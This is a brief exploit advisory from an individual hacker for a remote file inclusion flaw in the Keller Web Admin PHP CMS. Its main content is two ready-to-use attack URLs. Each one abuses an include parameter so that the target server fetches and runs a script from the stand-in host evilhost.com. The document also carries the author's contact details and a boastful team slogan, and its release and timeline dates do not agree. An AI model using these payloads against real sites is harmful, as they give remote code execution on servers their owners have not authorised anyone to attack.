Keller Web Admin Remote File Inclusion Exploit ----------------------| Release .:2007-10-08:.| ----------------------| -----------------| Timeline:17.11.07| -----------------| -----| Info:| -----| -----------------------------------------------------------------------------------------| KWA is an advanced CMS with many functions to explore. Site and content management system| with PHP implementation.| | -----------------------------------------------------------------------------------------| Exploit --------------------------------------------------------------------------------------| http://site.net/phpscripting.inc.php?inc=http://evilhost.com/evilscript? | http://site.net/authcheck.inc.php?inclConfig=http://evilhost.com/evilscript? | --------------------------------------------------------------------------------------| --------| Author :| --------| fl0 fl0w e-mail:flo[underscore]flow[underscore]supremacy[at]yahoo[dot]com site:http://fl0-fl0w.docspages.com A renslt.org team member ..."we're not the only ones but we're the best"